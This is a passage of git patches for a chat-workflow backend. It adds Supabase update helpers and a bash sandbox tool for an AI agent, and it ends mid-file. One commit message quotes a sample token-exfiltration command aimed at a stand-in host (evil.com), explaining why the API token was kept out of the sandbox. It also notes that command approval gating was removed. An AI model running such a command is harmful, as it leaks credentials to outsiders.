+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the
+ *     existing `id` conflict was silently ignored.
+ *   - `{ ok: false, error }` — Supabase failure. Visible to logs so transient
+ *     DB problems aren't masked as duplicates.
+ */
+export type UpsertChatMessageResult =
+  | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean }
+  | { ok: false; error: string };
+
+/**
+ * Insert-or-skip a single chat message row. Wraps Supabase upsert with
+ * `ignoreDuplicates: true` on the `id` primary key, but returns a
+ * discriminated result so callers can tell "duplicate skipped" apart from
+ * "DB error" — the previous helper returned `null` for both, which made
+ * callers silently swallow operational failures.
+ */
+export async function upsertChatMessage(
+  data: TablesInsert<"chat_messages">,
+): Promise<UpsertChatMessageResult> {
+  const { data: row, error } = await supabase
+    .from("chat_messages")
+    .upsert(data, { onConflict: "id", ignoreDuplicates: true })
+    .select()
+    .maybeSingle();
+
+  if (error) {
+    console.error("[upsertChatMessage] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return { ok: true, row, isDuplicate: row === null };
+}
diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts
new file mode 100644
index 000000000..a0edc247b
--- /dev/null
+++ b/lib/supabase/chats/__tests__/updateChat.test.ts
@@ -0,0 +1,110 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+const updateChain = vi.fn();
+const eqChain = vi.fn();
+const matchChain = vi.fn();
+const isChain = vi.fn();
+const selectChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ update: updateChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Fluent builder mock — every method returns the same builder so we can
+  // chain .eq / .match / .is / .select in any order without per-step setup.
+  const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain };
+  updateChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  matchChain.mockReturnValue(builder);
+  isChain.mockReturnValue(builder);
+});
+
+describe("updateChat", () => {
+  describe("plain update (no where predicate)", () => {
+    it("returns ok:true with rowsUpdated and the row on success", async () => {
+      const row = { id: "chat-1", title: "renamed" };
+      selectChain.mockResolvedValue({ data: [row], error: null });
+      const result = await updateChat({ id: "chat-1" }, { title: "renamed" });
+      expect(result.ok).toBe(true);
+      if (!result.ok) return;
+      expect(result.rowsUpdated).toBe(1);
+      expect(result.row).toEqual(row);
+      expect(updateChain).toHaveBeenCalledWith({ title: "renamed" });
+      expect(eqChain).toHaveBeenCalledWith("id", "chat-1");
+      // With no where filter, match is called with an empty object.
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("returns ok:false with error on Supabase failure", async () => {
+      selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+      const result = await updateChat({ id: "chat-x" }, { title: "x" });
+      expect(result.ok).toBe(false);
+      if (result.ok) return;
+      expect(result.error).toBe("down");
+    });
+  });
+
+  describe("generic where predicate", () => {
+    it("emits `is null` for null values (e.g. CAS expecting unset)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      // No non-null fields → match called with empty {}
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: "wrun_old" } },
+        { active_stream_id: "wrun_new" },
+      );
+      expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" });
+      // No null fields → is() not called
+      expect(isChain).not.toHaveBeenCalled();
+    });
+
+    it("AND-s nullable + equality where columns together", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } },
+        { title: "x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" });
+    });
+
+    it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => {
+      selectChain.mockResolvedValue({ data: [], error: null });
+      const result = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+    });
+
+    it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => {
+      selectChain.mockResolvedValueOnce({ data: [], error: null });
+      const raceLost = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+
+      selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } });
+      const dbError = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" }));
+    });
+  });
+});
diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts
new file mode 100644
index 000000000..63cd2064b
--- /dev/null
+++ b/lib/supabase/chats/updateChat.ts
@@ -0,0 +1,86 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesUpdate } from "@/types/database.types";
+
+/**
+ * Subset of `chats` columns that callers are permitted to mutate via this
+ * helper. Explicitly excludes structural fields (`id`, `session_id`,
+ * `created_at`) so generic updates cannot bypass chat invariants.
+ */
+export type ChatMutableFields = Pick<
+  TablesUpdate<"chats">,
+  "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at"
+>;
+
+/**
+ * Filter accepted by {@link updateChat}. Always matches by `id`. Optional
+ * `where` adds AND-ed predicates per column — generic across columns so
+ * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their
+ * own wrapper helpers rather than baking into the Supabase plumbing.
+ *
+ * Each `where` entry maps to `column = value` (or `column IS NULL` when
+ * `value === null`).
+ */
+export type UpdateChatFilter = {
+  id: string;
+  where?: Partial<Tables<"chats">>;
+};
+
+/**
+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, rowsUpdated: 1 }` — updated as intended.
+ *   - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS
+ *     race lost, or `id` not found).
+ *   - `{ ok: false, error }` — Supabase / network failure.
+ */
+export type UpdateChatResult =
+  | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null }
+  | { ok: false; error: string };
+
+/**
+ * Updates a `chats` row by id, optionally constrained by a generic `where`
+ * predicate. Returns a discriminated result so callers can tell
+ * "predicate didn't match" (a race lost) from "Supabase failure" (operational
+ * issue) — the previous behavior of returning `false` for both was a CAS bug.
+ */
+export async function updateChat(
+  filter: UpdateChatFilter,
+  updates: ChatMutableFields,
+): Promise<UpdateChatResult> {
+  // Split the optional `where` map into nullable vs equality predicates so we
+  // can apply each as a single chained call (`.match()` for equalities,
+  // `.is(col, null)` per nullable). Iterating with `let query = ...` and
+  // reassigning in a for-loop confuses Supabase's deeply generic builder
+  // types ("type instantiation is excessively deep") in the Next.js build.
+  const entries = Object.entries(filter.where ?? {});
+  const equalityMatches: Record<string, unknown> = {};
+  const nullColumns: string[] = [];
+  for (const [column, value] of entries) {
+    if (value === null) {
+      nullColumns.push(column);
+    } else {
+      equalityMatches[column] = value;
+    }
+  }
+
+  const baseQuery = supabase
+    .from("chats")
+    .update(updates)
+    .eq("id", filter.id)
+    .match(equalityMatches);
+  const finalQuery = nullColumns.reduce<typeof baseQuery>(
+    (q, column) => q.is(column, null) as typeof baseQuery,
+    baseQuery,
+  );
+
+  const { data, error } = await finalQuery.select();
+  if (error) {
+    console.error("[updateChat] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return {
+    ok: true,
+    rowsUpdated: data?.length ?? 0,
+    row: data?.[0] ?? null,
+  };
+}

From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:12:07 -0500
Subject: [PATCH 3/5] feat(chat-workflow): port bash sandbox tool + wire
 experimental_context (PR 4, slim) (#583)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  34 ++--
 app/lib/workflows/runAgentWorkflow.ts         |  32 ++--
 lib/agent/__tests__/buildAgentTools.test.ts   |  17 ++
 lib/agent/buildAgentTools.ts                  |  20 +++
 lib/agent/tools/AgentContext.ts               |  34 ++++
 lib/agent/tools/__tests__/bashTool.test.ts    | 158 ++++++++++++++++++
 .../__tests__/buildRecoupExecEnv.test.ts      |  31 ++++
 lib/agent/tools/__tests__/getSandbox.test.ts  |  39 +++++
 .../tools/__tests__/isAgentContext.test.ts    |  42 +++++
 lib/agent/tools/bashTool.ts                   | 116 +++++++++++++
 lib/agent/tools/buildRecoupExecEnv.ts         |  30 ++++
 lib/agent/tools/getSandbox.ts                 |  28 ++++
 lib/agent/tools/isAgentContext.ts             |  26 +++
 lib/agents/generalAgent/getGeneralAgent.ts    |   5 +-
 lib/chat/const.ts                             |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  20 +++
 16 files changed, 615 insertions(+), 30 deletions(-)
 create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts
 create mode 100644 lib/agent/buildAgentTools.ts
 create mode 100644 lib/agent/tools/AgentContext.ts
 create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
 create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts
 create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts
 create mode 100644 lib/agent/tools/bashTool.ts
 create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts
 create mode 100644 lib/agent/tools/getSandbox.ts
 create mode 100644 lib/agent/tools/isAgentContext.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 352dcd265..f9a894195 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -1,27 +1,36 @@
 import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
 import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
   modelId: string;
   writable: WritableStream<UIMessageChunk>;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so each tool's
+   * `execute` callback can read the sandbox state + per-prompt context.
+   */
+  agentContext: AgentContext;
 };
 
 /**
- * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
- * `"use step"` so that:
+ * One LLM turn (with internal tool-call iteration) in the chat workflow.
+ * Runs as a Vercel Workflow `"use step"` so:
  *
  *   - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside.
  *   - The result is cached as a single durable event — replays after a crash
- *     do not re-bill the model.
+ *     do not re-bill the model or re-execute tools.
  *
- * Currently emits a plain text response with no tools. Sandbox tools land in
- * the follow-up PR (port `@open-harness/agent` tools + wire via
- * `experimental_context`).
+ * `streamText` drives the tool-call → tool-result → next-LLM-call loop
+ * internally using its default stop condition. Our outer workflow stays
+ * single-turn for now — multi-turn message threading lands when the rest
+ * of the tool surface ports in a follow-up PR.
  *
- * @param input - Messages + selected model + the workflow's writable stream.
- * @returns finishReason from the model run (for the workflow loop's break condition).
+ * @param input - Messages + selected model + writable stream + agent context.
+ * @returns finishReason from the model run.
  */
 export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
   "use step";
@@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   console.log("[runAgentStep] start", {
     modelId: input.modelId,
     messageCount: input.messages.length,
+    hasSandboxState: Boolean(input.agentContext.sandbox?.state),
   });
 
   const modelMessages = convertToModelMessages(input.messages);
+  const tools = buildAgentTools();
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
     messages: modelMessages,
+    tools,
+    stopWhen: CHAT_AGENT_STOP_WHEN,
+    experimental_context: input.agentContext,
   });
 
-  // Acquire the writer once and release in `finally` — re-acquiring per chunk
-  // (the previous shape) leaked the lock when any write threw.
+  // Acquire the writer once and release in `finally` so a thrown chunk
+  // doesn't leak the lock.
   const writer = input.writable.getWriter();
   try {
     for await (const part of result.toUIMessageStream()) {
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
index db679145a..ce65b0bb3 100644
--- a/app/lib/workflows/runAgentWorkflow.ts
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -1,12 +1,18 @@
 import { getWritable } from "workflow";
 import type { UIMessage, UIMessageChunk } from "ai";
 import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentWorkflowInput = {
   messages: UIMessage[];
   chatId: string;
   sessionId: string;
   modelId: string;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so tools (bash et al.)
+   * can read sandbox state + per-prompt Recoup creds.
+   */
+  agentContext: AgentContext;
 };
 
 /**
@@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = {
  * client; this function writes UIMessage chunks into the workflow's writable
  * via `runAgentStep`.
  *
- * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is
- * unsafe today: each iteration would re-send the original prompt without
- * the assistant's tool-call response in scope, so a `tool-calls` finish
- * reason would loop forever on the same input. The proper multi-turn
- * shape (where the step appends its response to `messages` before the
- * next iteration) lands with the sandbox-tool port in PR 4.
- *
- * Until then, if the model returns `tool-calls` we log a warning and exit
- * — the client receives the partial tool-call chunks but no follow-up turn.
+ * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (up to
+ * MAX_TOOL_STEPS) happens INSIDE `streamText` via `stopWhen` — so the
+ * single workflow turn covers the full "user → assistant → tool → tool
+ * result → assistant" cycle without our outer loop having to thread
+ * messages between iterations.
  *
  * WDK constraints honored:
- *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions.
  *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
  */
 export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
@@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<vo
     messages: input.messages,
     modelId: input.modelId,
     writable,
+    agentContext: input.agentContext,
   });
 
-  if (result.finishReason === "tool-calls") {
-    console.warn(
-      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
-      { chatId: input.chatId },
-    );
-  } else {
-    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
-  }
+  console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
 }
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
new file mode 100644
index 000000000..52479cad0
--- /dev/null
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -0,0 +1,17 @@
+import { describe, it, expect } from "vitest";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+
+describe("buildAgentTools", () => {
+  it("returns a tools record keyed by tool name", () => {
+    const tools = buildAgentTools();
+    expect(tools).toHaveProperty("bash");
+    expect(typeof tools.bash).toBe("object");
+  });
+
+  it("each tool has an inputSchema, description, and execute", () => {
+    const tools = buildAgentTools();
+    expect(tools.bash.inputSchema).toBeDefined();
+    expect(tools.bash.description).toBeDefined();
+    expect(typeof tools.bash.execute).toBe("function");
+  });
+});
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
new file mode 100644
index 000000000..be6bde085
--- /dev/null
+++ b/lib/agent/buildAgentTools.ts
@@ -0,0 +1,20 @@
+import { bashTool } from "@/lib/agent/tools/bashTool";
+
+/**
+ * Factory for the full agent tool set passed into `streamText({ tools })`.
+ * Each tool reads its sandbox handle + recoup creds from `experimental_context`
+ * at execute time — the factory takes no arguments because the tools are
+ * stateless modulo that context.
+ *
+ * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
+ * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
+ * `fetch`) port in follow-up PRs and slot into this record one-by-one
+ * without changing the factory signature.
+ */
+export function buildAgentTools() {
+  return {
+    bash: bashTool(),
+  };
+}
+
+export type AgentTools = ReturnType<typeof buildAgentTools>;
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
new file mode 100644
index 000000000..63d2a1b7e
--- /dev/null
+++ b/lib/agent/tools/AgentContext.ts
@@ -0,0 +1,34 @@
+import type { VercelState } from "@/lib/sandbox/vercel/state";
+
+/**
+ * Per-tool-call context threaded into the agent via `streamText`'s
+ * `experimental_context`. Mirrors the open-agents `AgentContext` shape
+ * (subset — slim PR 4 ports only the `bash` tool, so context only needs
+ * what `bash` reads).
+ *
+ * Why no `recoupAccessToken` field? A short-lived per-prompt credential
+ * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call
+ * back to recoup-api as the caller. We deliberately omit it here — the
+ * legacy api-key path is too long-lived to expose inside a sandbox where
+ * model-issued bash commands can read env. Proper short-lived token
+ * minting lands alongside the `skill` tool port.
+ */
+export type AgentContext = {
+  /**
+   * Persistable sandbox state. Tools reconnect via `connectVercel(state)` —
+   * we never pass a live `Sandbox` instance through context because
+   * workflow durability requires replay-friendly inputs.
+   */
+  sandbox: {
+    state: VercelState;
+    workingDirectory: string;
+    currentBranch?: string;
+  };
+  /**
+   * Organization UUID when the sandbox was opened against a recoupable
+   * org repo (`org-<slug>-<uuid>`). Forwarded to sandboxed commands as
+   * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org.
+   * Public information — no security risk in exposing.
+   */
+  recoupOrgId?: string;
+};
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
new file mode 100644
index 000000000..da9a999d3
--- /dev/null
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { bashTool } from "@/lib/agent/tools/bashTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseContext = {
+  sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(overrides: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    exec: vi.fn(),
+    execDetached: vi.fn(),
+    ...overrides,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("bashTool.execute", () => {
+  it("executes a command via sandbox.exec in the sandbox's working directory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "README.md\npackage.json",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = await tool.execute!({ command: "ls" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(result).toEqual({
+      success: true,
+      exitCode: 0,
+      stdout: "README.md\npackage.json",
+      stderr: "",
+    });
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "lots of output",
+        stderr: "",
+        truncated: true,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "find ." }, {
+      experimental_context: baseContext,
+    } as never)) as { truncated?: boolean };
+    expect(result.truncated).toBe(true);
+  });
+
+  it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "ls", cwd: "apps/web" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono/apps/web",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("injects RECOUP_ORG_ID into the exec env when present in context", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "curl example.com" }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record<string, string> };
+    expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("returns the detached commandId when called with detached:true", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stdout: string };
+    expect(result.success).toBe(true);
+    expect(result.stdout).toMatch(/cmd-123/);
+    expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono");
+  });
+
+  it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => {
+    const sandbox = makeSandbox({ execDetached: undefined });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stderr: string };
+    expect(result.success).toBe(false);
+    expect(result.stderr).toMatch(/detached mode is not supported/i);
+  });
+
+  it("does NOT inject env vars on detached execs", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    // execDetached signature is (command, cwd) — no env arg.
+    expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2);
+  });
+});
diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
new file mode 100644
index 000000000..3422fd662
--- /dev/null
+++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+
+const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" };
+
+describe("buildRecoupExecEnv", () => {
+  it("returns undefined when no context", () => {
+    expect(buildRecoupExecEnv(undefined)).toBeUndefined();
+    expect(buildRecoupExecEnv(null)).toBeUndefined();
+    expect(buildRecoupExecEnv("not-a-context")).toBeUndefined();
+  });
+
+  it("returns undefined when context has no recoupOrgId", () => {
+    expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined();
+  });
+
+  it("injects RECOUP_ORG_ID when present in context", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" });
+    expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("ignores empty-string recoupOrgId", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" });
+    expect(env).toBeUndefined();
+  });
+
+  it("returns undefined when the input is not a valid AgentContext shape", () => {
+    expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined();
+    expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined();
+  });
+});
diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts
new file mode 100644
index 000000000..a14122f81
--- /dev/null
+++ b/lib/agent/tools/__tests__/getSandbox.test.ts
@@ -0,0 +1,39 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
